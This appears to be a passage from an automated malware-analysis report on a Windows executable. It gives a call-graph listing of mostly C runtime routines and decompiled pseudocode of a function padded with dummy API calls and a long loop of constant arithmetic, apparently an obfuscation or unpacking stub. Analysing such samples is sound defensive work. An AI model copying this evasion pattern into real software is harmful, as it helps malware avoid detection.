7711 40d961 __commit 7709->7711 7712 40d944 EnterCriticalSection 7709->7712 7713 40d910 7710->7713 7711->7692 7712->7711 7714 406d45 ___lock_fhandle InitializeCriticalSectionAndSpinCount 7713->7714 7716 40d927 7713->7716 7714->7716 7779 40d96f 7716->7779 7718 40b86b __write_nolock 7717->7718 7719 40b8c4 7718->7719 7720 40b89d 7718->7720 7750 40b892 7718->7750 7724 40b92c 7719->7724 7725 40b906 7719->7725 7721 404395 __commit 68 API calls 7720->7721 7723 40b8a2 7721->7723 7722 405ec0 ___mtold12 5 API calls 7726 40bf8d 7722->7726 7728 404382 __lseeki64_nolock 68 API calls 7723->7728 7727 40b940 7724->7727 7783 40d720 7724->7783 7729 404395 __commit 68 API calls 7725->7729 7726->7700 7793 408468 7727->7793 7731 40b8a9 7728->7731 7733 40b90b 7729->7733 7735 404856 __commit 6 API calls 7731->7735 7734 404382 __lseeki64_nolock 68 API calls 7733->7734 7737 40b914 7734->7737 7735->7750 7736 40b94b 7738 40bbf1 7736->7738 7742 4063f0 __getptd 68 API calls 7736->7742 7739 404856 __commit 6 API calls 7737->7739 7740 40bec0 WriteFile 7738->7740 7741 40bc01 7738->7741 7739->7750 7743 40bef3 GetLastError 7740->7743 7744 40bbd3 7740->7744 7745 40bcdf 7741->7745 7765 40bc15 7741->7765 7746 40b966 GetConsoleMode 7742->7746 7743->7744 7747 40bf3e 7744->7747 7744->7750 7752 40bf11 7744->7752 7764 40bdbf 7745->7764 7767 40bcee 7745->7767 7746->7738 7748 40b991 7746->7748 7747->7750 7751 404382 __lseeki64_nolock 68 API calls 7747->7751 7748->7738 7749 40b9a3 GetConsoleCP 7748->7749 7749->7744 7770 40b9c6 7749->7770 7750->7722 7754 40bf61 7751->7754 7756 40bf30 7752->7756 7757 40bf1c 7752->7757 7753 40bc83 WriteFile 7753->7743 7753->7765 7758 404395 __commit 68 API calls 7754->7758 7755 40be25 WideCharToMultiByte 7755->7743 7760 40be5c WriteFile 7755->7760 7805 4043a8 7756->7805 7759 404382 __lseeki64_nolock 68 API calls 7757->7759 7758->7750 7766 40bf21 7759->7766 7763 40be93 GetLastError 7760->7763 7760->7764 7761 40bd63 WriteFile 7761->7743 7761->7767 7763->7764 7764->7744 7764->7747 7764->7755 7764->7760 7765->7744 7765->7747 7765->7753 7769 404395 __commit 68 API calls 7766->7769 7767->7744 7767->7747 7767->7761 7769->7750 7770->7743 7770->7744 7771 4090b2 80 API calls __fassign 7770->7771 7772 40ba72 WideCharToMultiByte 7770->7772 7774 40d65b 11 API calls __putwch_nolock 7770->7774 7775 40baf7 WriteFile 7770->7775 7802 409104 7770->7802 7771->7770 7772->7744 7773 40baa3 WriteFile 7772->7773 7773->7743 7773->7770 7774->7770 7775->7743 7775->7770 7823 40d978 LeaveCriticalSection 7776->7823 7778 40c069 7778->7697 7782 406768 LeaveCriticalSection 7779->7782 7781 40d976 7781->7709 7782->7781 7810 40d861 7783->7810 7785 40d73e 7786 40d746 7785->7786 7787 40d757 SetFilePointer 7785->7787 7788 404382 __lseeki64_nolock 68 API calls 7786->7788 7789 40d74b 7787->7789 7790 40d76f GetLastError 7787->7790 7788->7789 7789->7727 7790->7789 7791 40d779 7790->7791 7792 4043a8 __dosmaperr 68 API calls 7791->7792 7792->7789 7794 408484 7793->7794 7795 408475 7793->7795 7797 4084a8 7794->7797 7798 404382 __lseeki64_nolock 68 API calls 7794->7798 7796 404382 __lseeki64_nolock 68 API calls 7795->7796 7799 40847a 7796->7799 7797->7736 7800 408498 7798->7800 7799->7736 7801 404856 __commit 6 API calls 7800->7801 7801->7797 7803 4090cc __isleadbyte_l 78 API calls 7802->7803 7804 409113 7803->7804 7804->7770 7806 404395 __commit 68 API calls 7805->7806 7807 4043b3 _realloc 7806->7807 7808 404382 __lseeki64_nolock 68 API calls 7807->7808 7809 4043c6 7808->7809 7809->7750 7811 40d886 7810->7811 7812 40d86e 7810->7812 7814 404395 __commit 68 API calls 7811->7814 7818 40d8cb 7811->7818 7813 404395 __commit 68 API calls 7812->7813 7815 40d873 7813->7815 7816 40d8b4 7814->7816 7817 404382 __lseeki64_nolock 68 API calls 7815->7817 7819 404382 __lseeki64_nolock 68 API calls 7816->7819 7820 40d87b 7817->7820 7818->7785 7821 40d8bb 7819->7821 7820->7785 7822 404856 __commit 6 API calls 7821->7822 7822->7818 7823->7778 7825 40d861 __lseeki64_nolock 68 API calls 7824->7825 7827 40d4d1 7825->7827 7826 40d527 7842 40d7db 7826->7842 7827->7826 7829 40d861 __lseeki64_nolock 68 API calls 7827->7829 7838 40d505 7827->7838 7833 40d4fc 7829->7833 7830 40d861 __lseeki64_nolock 68 API calls 7834 40d511 CloseHandle 7830->7834 7832 40d551 7832->7677 7836 40d861 __lseeki64_nolock 68 API calls 7833->7836 7834->7826 7837 40d51d GetLastError 7834->7837 7835 4043a8 __dosmaperr 68 API calls 7835->7832 7836->7838 7837->7826 7838->7826 7838->7830 7851 40d978 LeaveCriticalSection 7839->7851 7841 40d628 7841->7669 7843 40d847 7842->7843 7844 40d7ec 7842->7844 7845 404382 __lseeki64_nolock 68 API calls 7843->7845 7844->7843 7848 40d817 7844->7848 7846 40d84c 7845->7846 7847 404395 __commit 68 API calls 7846->7847 7849 40d52f 7847->7849 7848->7849 7850 40d837 SetStdHandle 7848->7850 7849->7832 7849->7835 7850->7849 7851->7841 7853 40465d LeaveCriticalSection 7852->7853 7854 40463e 7852->7854 7853->7639 7854->7853 7855 404645 7854->7855 7858 406768 LeaveCriticalSection 7855->7858 7857 40465a 7857->7639 7858->7857 7859->7614 7069 40619b 7070 406129 __encode_pointer 7 API calls 7069->7070 7071 4061a2 7070->7071 7451 406ddc 7452 406e18 7451->7452 7454 406dee 7451->7454 7454->7452 7455 406b6d 7454->7455 7456 406b79 __commit 7455->7456 7457 4063f0 __getptd 68 API calls 7456->7457 7460 406b7e 7457->7460 7461 4039d2 7460->7461 7462 4039f1 7461->7462 7463 4039f8 7461->7463 7465 405cdc __NMSG_WRITE 68 API calls 7462->7465 7473 405b1f 7463->7473 7465->7463 7468 403ae1 7497 403dd6 7468->7497 7469 403a09 _memset 7469->7468 7471 403aa1 SetUnhandledExceptionFilter UnhandledExceptionFilter 7469->7471 7471->7468 7474 4061a4 __decode_pointer 6 API calls 7473->7474 7475 4039fe 7474->7475 7475->7469 7476 405b2c 7475->7476 7479 405b38 __commit 7476->7479 7477 405b94 7478 405b75 7477->7478 7482 405ba3 7477->7482 7483 4061a4 __decode_pointer 6 API calls 7478->7483 7479->7477 7479->7478 7480 405b5f 7479->7480 7485 405b5b 7479->7485 7481 406377 __getptd_noexit 68 API calls 7480->7481 7486 405b64 _siglookup 7481->7486 7484 404382 __lseeki64_nolock 68 API calls 7482->7484 7483->7486 7487 405ba8 7484->7487 7485->7480 7485->7482 7488 405c0a 7486->7488 7490 403dd6 _raise 68 API calls 7486->7490 7496 405b6d __commit 7486->7496 7489 404856 __commit 6 API calls 7487->7489 7491 406842 __lock 68 API calls 7488->7491 7493 405c15 7488->7493 7489->7496 7490->7488 7491->7493 7492 40619b _doexit 7 API calls 7494 405c4a 7492->7494 7493->7492 7493->7494 7500 405ca0 7494->7500 7496->7469 7498 403c94 _doexit 68 API calls 7497->7498 7499 403ae8 7498->7499 7501 405ca6 7500->7501 7502 405cad 7500->7502 7504 406768 LeaveCriticalSection 7501->7504 7502->7496 7504->7502 7860 40fa9c 7861 40fab5 7860->7861 7862 40faad 7860->7862 7864 40fac7 7861->7864 7865 40fac4 CloseHandle 7861->7865 7862->7861 7863 40fab2 CloseHandle 7862->7863 7863->7861 7865->7864 7243 406e1e SetUnhandledExceptionFilter 7866 40949f 7869 409313 7866->7869 7870 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7869->7870 7871 409327 7870->7871 7878 40cd42 7871->7878 7873 409333 7874 409347 7873->7874 7882 40a9d1 7873->7882 7875 40cd42 __forcdecpt_l 103 API calls 7874->7875 7877 409350 7875->7877 7879 40cd60 7878->7879 7880 40cd50 7878->7880 7887 40cc2d 7879->7887 7880->7873 7883 40a9f1 7882->7883 7884 40a9df 7882->7884 7899 40a980 7883->7899 7884->7873 7888 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7887->7888 7889 40cc42 7888->7889 7890 40cca2 7889->7890 7891 40cc4e 7889->7891 7893 4090cc __isleadbyte_l 78 API calls 7890->7893 7896 40ccc7 7890->7896 7892 40a7e0 __isctype_l 92 API calls 7891->7892 7897 40cc66 7891->7897 7892->7897 7893->7896 7894 404382 __lseeki64_nolock 68 API calls 7895 40cccd 7894->7895 7898 40c4f1 ___crtLCMapStringA 103 API calls 7895->7898 7896->7894 7896->7895 7897->7880 7898->7897 7900 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7899->7900 7901 40a993 7900->7901 7902 40a7e0 __isctype_l 92 API calls 7901->7902 7903 40a9ad 7901->7903 7902->7903 7903->7873 7505 4048e0 7506 404919 7505->7506 7507 40490c 7505->7507 7509 405ec0 ___mtold12 5 API calls 7506->7509 7508 405ec0 ___mtold12 5 API calls 7507->7508 7508->7506 7510 404929 __except_handler4 __IsNonwritableInCurrentImage 7509->7510 7511 4049ac 7510->7511 7512 404982 __except_handler4 7510->7512 7521 4092e2 RtlUnwind 7510->7521 7512->7511 7513 40499c 7512->7513 7514 405ec0 ___mtold12 5 API calls 7512->7514 7515 405ec0 ___mtold12 5 API calls 7513->7515 7514->7513 7515->7511 7517 4049fb __except_handler4 7518 404a2f 7517->7518 7519 405ec0 ___mtold12 5 API calls 7517->7519 7520 405ec0 ___mtold12 5 API calls 7518->7520 7519->7518 7520->7512 7521->7517 7155 409466 7158 409424 7155->7158 7159 409450 7158->7159 7160 409437 7158->7160 7171 40ce16 7159->7171 7164 40cd6e 7160->7164 7163 409440 7165 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7164->7165 7166 40cd94 7165->7166 7178 40e624 7166->7178 7168 40cdac __ld12tod 7169 405ec0 ___mtold12 5 API calls 7168->7169 7170 40ce14 7169->7170 7170->7163 7172 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7171->7172 7173 40ce3c 7172->7173 7174 40e624 ___strgtold12_l 68 API calls 7173->7174 7175 40ce54 __ld12tod 7174->7175 7176 405ec0 ___mtold12 5 API calls 7175->7176 7177 40cebc 7176->7177 7177->7163 7179 40e66f 7178->7179 7185 40e68e 7178->7185 7180 404382 __lseeki64_nolock 68 API calls 7179->7180 7181 40e674 7180->7181 7182 404856 __commit 6 API calls 7181->7182 7187 40e684 7182->7187 7183 405ec0 ___mtold12 5 API calls 7184 40ece9 7183->7184 7184->7168 7185->7187 7188 40fb31 7185->7188 7187->7183 7191 40fb63 7188->7191 7189 405ec0 ___mtold12 5 API calls 7190 40fcfd 7189->7190 7190->7187 7191->7189 7526 4044e9 7527 4044f6 7526->7527 7528 40810e __calloc_crt 68 API calls 7527->7528 7529 404510 7528->7529 7530 40810e __calloc_crt 68 API calls 7529->7530 7531 404529 7529->7531 7530->7531 7904 403fab 7907 406bb8 7904->7907 7908 406377 __getptd_noexit 68 API calls 7907->7908 7909 403fbc 7908->7909 7244 40692f 7245 40810e __calloc_crt 68 API calls 7244->7245 7246 40693b 7245->7246 7247 406129 __encode_pointer 7 API calls 7246->7247 7248 406943 7247->7248 7910 4094b2 7913 409386 7910->7913 7914 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7913->7914 7915 40939a 7914->7915 7192 40a977 7193 403b50 __amsg_exit 68 API calls 7192->7193 7194 40a97e 7193->7194 7195 406d7d 7196 406d89 SetLastError 7195->7196 7197 406d91 __commit 7195->7197 7196->7197 7532 4040fe 7533 404118 __indefinite 7532->7533 7534 40418a 69 API calls 7533->7534 7535 404130 7534->7535 7536 403ffe 7539 407430 7536->7539 7538 404003 7538->7538 7540 407462 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 7539->7540 7541 407455 7539->7541 7542 407459 7540->7542 7541->7540 7541->7542 7542->7538 7916 403fbf 7917 403fd4 7916->7917 7918 403fce 7916->7918 7922 403dfb 7917->7922 7919 403dd6 _raise 68 API calls 7918->7919 7919->7917 7921 403fd9 __commit 7923 403c94 _doexit 68 API calls 7922->7923 7924 403e06 7923->7924 7924->7921

                                                            Control-flow Graph

                                                            C-Code - Quality: 77%
                                                            			E00402ADC(void* __fp0) {
                                                            				intOrPtr _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				intOrPtr _v68;
                                                            				intOrPtr _v72;
                                                            				intOrPtr _v76;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v84;
                                                            				intOrPtr _v88;
                                                            				intOrPtr _v92;
                                                            				intOrPtr _v96;
                                                            				intOrPtr _v100;
                                                            				intOrPtr _v104;
                                                            				intOrPtr _v108;
                                                            				intOrPtr _v112;
                                                            				intOrPtr _v116;
                                                            				intOrPtr _v120;
                                                            				intOrPtr _v124;
                                                            				intOrPtr _v128;
                                                            				intOrPtr _v132;
                                                            				intOrPtr _v136;
                                                            				intOrPtr _v140;
                                                            				intOrPtr _v144;
                                                            				intOrPtr _v148;
                                                            				intOrPtr _v152;
                                                            				intOrPtr _v156;
                                                            				intOrPtr _v160;
                                                            				intOrPtr _v164;
                                                            				intOrPtr _v168;
                                                            				intOrPtr _v172;
                                                            				intOrPtr _v176;
                                                            				intOrPtr _v180;
                                                            				intOrPtr _v184;
                                                            				intOrPtr _v188;
                                                            				intOrPtr _v192;
                                                            				intOrPtr _v196;
                                                            				intOrPtr _v200;
                                                            				intOrPtr _v204;
                                                            				intOrPtr _v208;
                                                            				intOrPtr _v212;
                                                            				intOrPtr _v216;
                                                            				intOrPtr _v220;
                                                            				intOrPtr _v224;
                                                            				intOrPtr _v228;
                                                            				intOrPtr _v232;
                                                            				intOrPtr _v236;
                                                            				intOrPtr _v240;
                                                            				intOrPtr _v244;
                                                            				intOrPtr _v248;
                                                            				intOrPtr _v252;
                                                            				intOrPtr _v256;
                                                            				intOrPtr _v260;
                                                            				intOrPtr _v264;
                                                            				intOrPtr _v268;
                                                            				intOrPtr _v272;
                                                            				intOrPtr _v276;
                                                            				intOrPtr _v280;
                                                            				intOrPtr _v284;
                                                            				intOrPtr _v288;
                                                            				intOrPtr _v292;
                                                            				intOrPtr _v296;
                                                            				intOrPtr _v300;
                                                            				intOrPtr _v304;
                                                            				intOrPtr _v308;
                                                            				intOrPtr _v312;
                                                            				intOrPtr _v316;
                                                            				intOrPtr _v320;
                                                            				intOrPtr _v324;
                                                            				intOrPtr _v328;
                                                            				intOrPtr _v332;
                                                            				intOrPtr _v336;
                                                            				intOrPtr _v340;
                                                            				intOrPtr _v344;
                                                            				intOrPtr _v348;
                                                            				long _v352;
                                                            				char _v356;
                                                            				void* _t1147;
                                                            				void* _t1226;
                                                            				void* _t1236;
                                                            
                                                            				_t1236 = __fp0;
                                                            				if( *0x479904 == 0x20) {
                                                            					WindowFromDC(0);
                                                            					FreeEnvironmentStringsA(0);
                                                            					GetNumberOfConsoleMouseButtons(0);
                                                            					ResetEvent(0);
                                                            					EndUpdateResourceW(0, 0);
                                                            					GetComputerNameW(0, 0);
                                                            					E00403954(_t1147, 0, 0);
                                                            					E00403954(_t1147, 0, 0);
                                                            					_pop(_t1147);
                                                            					_v352 = 0;
                                                            					_v356 = 0;
                                                            					E004026A0();
                                                            					st0 = _t1236;
                                                            				}
                                                            				_t1226 = 0;
                                                            				while(1) {
                                                            					SetCommMask(0, 0); // executed
                                                            					SetLastError(0);
                                                            					__imp__GetConsoleAliasW(0, 0, 0, 0);
                                                            					if(_t1226 < 0x2481de) {
                                                            						_v20 = 0x203525ba;
                                                            						_v180 = 0x29672311;
                                                            						_v280 = 0x16c17e2f;
                                                            						_v160 = 0x4b37d46c;
                                                            						_v336 = 0x71be5419;
                                                            						_v304 = 0x2a6f2367;
                                                            						_v64 = 0x11c0adcd;
                                                            						_v152 = 0x3ddf365e;
                                                            						_v28 = 0x14911e74;
                                                            						_v308 = 0x50ce19d3;
                                                            						_v68 = 0x46f869e8;
                                                            						_v340 = 0x73e340fc;
                                                            						_v80 = 0x1359616b;
                                                            						_v76 = 0x656bf717;
                                                            						_v348 = 0x4f4a2ff8;
                                                            						_v84 = 0x8d23614;
                                                            						_v188 = 0x5ed12ef4;
                                                            						_v200 = 0x76f0e45a;
                                                            						_v140 = 0x2b9e4787;
                                                            						_v268 = 0x6871870a;
                                                            						_v240 = 0x67b6becb;
                                                            						_v48 = 0x703cc4ef;
                                                            						_v264 = 0x3a9d68c1;
                                                            						_v248 = 0x5eea6a45;
                                                            						_v36 = 0x6999b15b;
                                                            						_v44 = 0x2c309c02;
                                                            						_v276 = 0x14ac6c8f;
                                                            						_v40 = 0x7eee8d2e;
                                                            						_v144 = 0x547f0d36;
                                                            						_v112 = 0x70d291f5;
                                                            						_v356 = 0x209b567d;
                                                            						_v92 = 0x16da1455;
                                                            						_v100 = 0x1ae444cc;
                                                            						_v316 = 0x41516c8a;
                                                            						_v284 = 0x75a895a4;
                                                            						_v196 = 0x15561db7;
                                                            						_v272 = 0x3730d9c8;
                                                            						_v344 = 0x30ddf634;
                                                            						_v136 = 0x7892e542;
                                                            						_v148 = 0x5f170584;
                                                            						_v156 = 0x33c4e1ea;
                                                            						_v208 = 0x592940f0;
                                                            						_v324 = 0x25410382;
                                                            						_v292 = 0x67c87b5b;
                                                            						_v52 = 0x724cb291;
                                                            						_v108 = 0x2af6ce75;
                                                            						_v204 = 0x5346c5e;
                                                            						_v236 = 0x68a67ef7;
                                                            						_v216 = 0x7b2ef7dc;
                                                            						_v56 = 0x74b593a5;
                                                            						_v312 = 0x442ae7f3;
                                                            						_v184 = 0x18dee23d;
                                                            						_v120 = 0x4a7db4c;
                                                            						_v244 = 0x5884e700;
                                                            						_v116 = 0x7e8f4c2b;
                                                            						_v212 = 0x1027ca35;
                                                            						_v60 = 0x6f79f0f4;
                                                            						_v224 = 0x32bf6067;
                                                            						_v32 = 0x3570696a;
                                                            						_v288 = 0x15c8667f;
                                                            						_v220 = 0x8717856;
                                                            						_v124 = 0x6fcd3c9f;
                                                            						_v168 = 0x1bef4f4e;
                                                            						_v164 = 0x7e858361;
                                                            						_v300 = 0x4e1e64a2;
                                                            						_v104 = 0x35510366;
                                                            						_v320 = 0xb4a6467;
                                                            						_v72 = 0x53bb5cdd;
                                                            						_v96 = 0x57bdb0e;
                                                            						_v24 = 0x70f6f7ee;
                                                            						_v232 = 0x3fc2330c;
                                                            						_v328 = 0xc54e702;
                                                            						_v176 = 0x7f8ffaab;
                                                            						_v252 = 0x74e8996d;
                                                            						_v260 = 0x7a2361af;
                                                            						_v352 = 0x76ab72d3;
                                                            						_v172 = 0x3e506ff;
                                                            						_v88 = 0x4b61cfc9;
                                                            						_v256 = 0x34de0ea9;
                                                            						_v128 = 0x6d4d3170;
                                                            						_v228 = 0x232f9bdf;
                                                            						_v296 = 0x7089e762;
                                                            						_v332 = 0x6a3cdcab;
                                                            						_v192 = 0x524caf93;
                                                            						_v132 = 0x8c70c07;
                                                            						_v20 = _v20 + 0x4d3d3510;
                                                            						_v20 = _v20 + 0x135e1da;
                                                            						_v20 = _v20 + 0x35180cbe;
                                                            						_v20 = _v20 + 0x696d0ef2;
                                                            						_v20 = _v20 - 0x4e4a5034;
                                                            						_v20 = _v20 + 0x1b72df8b;
                                                            						_v20 = _v20 + 0x2c22951d;
                                                            						_v180 = _v180 + 0x2bd64939;
                                                            						_v64 = _v64 - 0x6da53567;
                                                            						_v304 = _v304 - 0x699b0b87;
                                                            						_v304 = _v304 + 0x20323dd;
                                                            						_v180 = _v180 - 0x16e3b0b6;
                                                            						_v336 = _v336 + 0x379dca51;
                                                            						_v280 = _v280 - 0x47b51208;
                                                            						_v76 = _v76 + 0x492b8f25;
                                                            						_v340 = _v340 - 0x69e2e061;
                                                            						_v76 = _v76 - 0x12d5d61e;
                                                            						_v80 = _v80 + 0x5e29d58;
                                                            						_v180 = _v180 + 0xa80e177;
                                                            						_v160 = _v160 - 0xf70455;
                                                            						_v336 = _v336 - 0x219e6b92;
                                                            						_v28 = _v28 - 0x20485ec4;
                                                            						_v28 = _v28 + 0x69ace6c8;
                                                            						_v308 = _v308 + 0x5a216d35;
                                                            						_v180 = _v180 + 0x3f843f47;
                                                            						_v308 = _v308 - 0x95cc609;
                                                            						_v308 = _v308 + 0x7d3a90d6;
                                                            						_v308 = _v308 - 0x73f44647;
                                                            						_v152 = _v152 + 0x6a2057fb;
                                                            						_v28 = _v28 - 0x52161216;
                                                            						_v348 = _v348 + 0x781183f9;
                                                            						_v340 = _v340 - 0x3fe7a1ba;
                                                            						_v140 = _v140 + 0x364cdd66;
                                                            						_v152 = _v152 - 0x2da2fae0;
                                                            						_v80 = _v80 - 0x3089ddf6;
                                                            						_v340 = _v340 + 0x600f4bd8;
                                                            						_v64 = _v64 + 0x6d466040;
                                                            						_v336 = _v336 - 0x6da3abc8;
                                                            						_v308 = _v308 + 0x366d9f10;
                                                            						_v48 = _v48 - 0x1ef2a420;
                                                            						_v152 = _v152 - 0x766c1a9e;
                                                            						_v28 = _v28 - 0x579729e1;
                                                            						_v140 = _v140 - 0x7eab5274;
                                                            						_v340 = _v340 + 0x1de85669;
                                                            						_v20 = _v20 - 0xbcf4e6e;
                                                            						_v308 = _v308 + 0x3d316046;
                                                            						_v264 = _v264 - 0x3f906759;
                                                            						_v80 = _v80 - 0xeb78cd9;
                                                            						_v152 = _v152 + 0x3b85cf27;
                                                            						_v268 = _v268 + 0x6693ae15;
                                                            						_v76 = _v76 + 0x5f10712f;
                                                            						_v240 = _v240 - 0x777dd0d3;
                                                            						_v268 = _v268 - 0x607f0eba;
                                                            						_v276 = _v276 - 0x65495b43;
                                                            						_v140 = _v140 - 0x10ace82b;
                                                            						_v348 = _v348 + 0x6e02360d;
                                                            						_v248 = _v248 - 0x41f3300a;
                                                            						_v44 = _v44 - 0x747dc239;
                                                            						_v276 = _v276 - 0x43b4b4c;
                                                            						_v76 = _v76 + 0x729b4def;
                                                            						_v340 = _v340 - 0xa2bdbda;
                                                            						_v340 = _v340 + 0x6f8e2f6a;
                                                            						_v336 = _v336 - 0x36e72425;
                                                            						_v308 = _v308 + 0x785a2b54;
                                                            						_v44 = _v44 - 0x26d04c95;
                                                            						_v84 = _v84 + 0x49b7c039;
                                                            						_v100 = _v100 - 0x6d199031;
                                                            						_v308 = _v308 + 0x2643aac5;
                                                            						_v40 = _v40 + 0x6b8f9482;
                                                            						_v28 = _v28 - 0x8ae8a90;
                                                            						_v160 = _v160 - 0x41898451;
                                                            						_v112 = _v112 - 0x7fe90396;
                                                            						_v112 = _v112 - 0x8093c62;
                                                            						_v144 = _v144 + 0x23975e2e;
                                                            						_v356 = _v356 + 0x1589bd55;
                                                            						_v76 = _v76 + 0x39c11ed;
                                                            						_v84 = _v84 - 0x54345c52;
                                                            						_v36 = _v36 + 0x7460d598;
                                                            						_v264 = _v264 + 0x4d3daef6;
                                                            						_v160 = _v160 - 0x4ea53d47;
                                                            						_v64 = _v64 - 0x6dd2bf73;
                                                            						_v324 = _v324 - 0x139d206e;
                                                            						_v36 = _v36 + 0x7ae2f425;
                                                            						_v336 = _v336 - 0x1862274f;
                                                            						_v264 = _v264 - 0x491e7eb3;
                                                            						_v156 = _v156 - 0x2acc84e8;
                                                            						_v36 = _v36 + 0x6122182d;
                                                            						_v340 = _v340 - 0x3deb6422;
                                                            						_v28 = _v28 + 0x60ec9f16;
                                                            						_v236 = _v236 - 0x3d84af5c;
                                                            						_v44 = _v44 - 0x1c2c5424;
                                                            						_v52 = _v52 - 0x38f9b257;
                                                            						_v204 = _v204 + 0x70e625ba;
                                                            						_v76 = _v76 + 0x4a9ab101;
                                                            						_v28 = _v28 - 0x6ca4d981;
                                                            						_v280 = _v280 + 0x7fbf517a;
                                                            						_v184 = _v184 + 0x1c88656f;
                                                            						_v36 = _v36 + 0x7d47acbf;
                                                            						_v188 = _v188 - 0x4100354b;
                                                            						_v108 = _v108 - 0x50dbfa28;
                                                            						_v304 = _v304 + 0x3f6cf8f7;
                                                            						_v76 = _v76 + 0x77e468d6;
                                                            						_v280 = _v280 + 0x45366263;
                                                            						_v36 = _v36 + 0x3e5018aa;
                                                            						_v236 = _v236 + 0x76430e4a;
                                                            						_v204 = _v204 - 0x5e97967d;
                                                            						_v344 = _v344 - 0x156ad00d;
                                                            						_v196 = _v196 + 0x50a85af0;
                                                            						_v340 = _v340 + 0x14bc8a19;
                                                            						_v244 = _v244 + 0x64a01771;
                                                            						_v40 = _v40 - 0x74023300;
                                                            						_v156 = _v156 - 0x3b643513;
                                                            						_v100 = _v100 - 0x53ffed8f;
                                                            						_v144 = _v144 - 0x2e682f84;
                                                            						_v180 = _v180 + 0x475aac54;
                                                            						_v220 = _v220 - 0x47dc6a5b;
                                                            						_v220 = _v220 - 0x1c18d963;
                                                            						_v340 = _v340 - 0x394aef10;
                                                            						_v272 = _v272 + 0x4afb8733;
                                                            						_v284 = _v284 + 0x1158e7b7;
                                                            						_v184 = _v184 + 0x2a332265;
                                                            						_v264 = _v264 + 0x1e01fc46;
                                                            						_v176 = _v176 + 0x59cb4930;
                                                            						_v320 = _v320 - 0x3746ef35;
                                                            						_v304 = _v304 - 0x33901629;
                                                            						_v148 = _v148 + 0x200960fa;
                                                            						_v268 = _v268 + 0x270d63c2;
                                                            						_v328 = _v328 - 0x538ef25c;
                                                            						_v56 = _v56 - 0x1442058;
                                                            						_v176 = _v176 + 0x202d0e4e;
                                                            						_v48 = _v48 - 0x128ada4f;
                                                            						_v72 = _v72 - 0x1bbf669e;
                                                            						_v184 = _v184 - 0x16d9feb0;
                                                            						_v152 = _v152 - 0x551d7c0;
                                                            						_v284 = _v284 + 0x7f0531ec;
                                                            						_v152 = _v152 - 0x53344960;
                                                            						_v40 = _v40 + 0x17ab5b83;
                                                            						_v40 = _v40 - 0x4cb3ea82;
                                                            					}
                                                            					if(_t1226 > 0x23f110) {
                                                            						break;
                                                            					}
                                                            					_t1226 = _t1226 + 1;
                                                            					if(_t1226 < 0x152fade0) {
                                                            						continue;
                                                            					}
                                                            					break;
                                                            				}
                                                            				 *0x479904 =  *0x417cdc;
                                                            				 *0x479908 =  *0x416d3c;
                                                            				E0040297F(_t1147);
                                                            				return 0;
                                                            			}



























































































                                                            0x00402adc
                                                            0x00402aed
                                                            0x00402af0
                                                            0x00402af7
                                                            0x00402afe
                                                            0x00402b05
                                                            0x00402b0d
                                                            0x00402b15
                                                            0x00402b1d
                                                            0x00402b24
                                                            0x00402b2a
                                                            0x00402b2b
                                                            0x00402b2f
                                                            0x00402b32
                                                            0x00402b37
                                                            0x00402b37
                                                            0x00402b39
                                                            0x00402b3b
                                                            0x00402b3d
                                                            0x00402b44
                                                            0x00402b4e
                                                            0x00402b5a
                                                            0x00402b60
                                                            0x00402b6b
                                                            0x00402b76
                                                            0x00402b7e
                                                            0x00402b89
                                                            0x00402b91
                                                            0x00402b99
                                                            0x00402ba4
                                                            0x00402baf
                                                            0x00402bba
                                                            0x00402bc2
                                                            0x00402bcd
                                                            0x00402bd5
                                                            0x00402be0
                                                            0x00402beb
                                                            0x00402bf3
                                                            0x00402bfe
                                                            0x00402c09
                                                            0x00402c14
                                                            0x00402c1f
                                                            0x00402c27
                                                            0x00402c2f
                                                            0x00402c3a
                                                            0x00402c42
                                                            0x00402c4a
                                                            0x00402c55
                                                            0x00402c60
                                                            0x00402c68
                                                            0x00402c73
                                                            0x00402c7e
                                                            0x00402c89
                                                            0x00402c91
                                                            0x00402c9c
                                                            0x00402ca7
                                                            0x00402caf
                                                            0x00402cb7
                                                            0x00402cc2
                                                            0x00402cca
                                                            0x00402cd2
                                                            0x00402cdd
                                                            0x00402ce8
                                                            0x00402cf3
                                                            0x00402cfe
                                                            0x00402d06
                                                            0x00402d0e
                                                            0x00402d19
                                                            0x00402d24
                                                            0x00402d2f
                                                            0x00402d3a
                                                            0x00402d45
                                                            0x00402d50
                                                            0x00402d58
                                                            0x00402d63
                                                            0x00402d6e
                                                            0x00402d76
                                                            0x00402d81
                                                            0x00402d8c
                                                            0x00402d97
                                                            0x00402da2
                                                            0x00402dad
                                                            0x00402db5
                                                            0x00402dc0
                                                            0x00402dcb
                                                            0x00402dd6
                                                            0x00402de1
                                                            0x00402de9
                                                            0x00402df4
                                                            0x00402dfc
                                                            0x00402e07
                                                            0x00402e12
                                                            0x00402e1d
                                                            0x00402e28
                                                            0x00402e30
                                                            0x00402e3b
                                                            0x00402e43
                                                            0x00402e4b
                                                            0x00402e53
                                                            0x00402e5e
                                                            0x00402e69
                                                            0x00402e71
                                                            0x00402e7c
                                                            0x00402e87
                                                            0x00402e8f
                                                            0x00402e97
                                                            0x00402ea2
                                                            0x00402ead
                                                            0x00402ecb
                                                            0x00402ed6
                                                            0x00402ee1
                                                            0x00402eec
                                                            0x00402ef7
                                                            0x00402f02
                                                            0x00402f0d
                                                            0x00402f45
                                                            0x00402f50
                                                            0x00402f85
                                                            0x00402fa0
                                                            0x00402fd1
                                                            0x00402fd9
                                                            0x00402ff4
                                                            0x00402fff
                                                            0x00403014
                                                            0x0040301f
                                                            0x0040302a
                                                            0x00403035
                                                            0x00403040
                                                            0x00403048
                                                            0x00403053
                                                            0x0040306b
                                                            0x00403073
                                                            0x0040307e
                                                            0x00403086
                                                            0x0040309b
                                                            0x004030a3
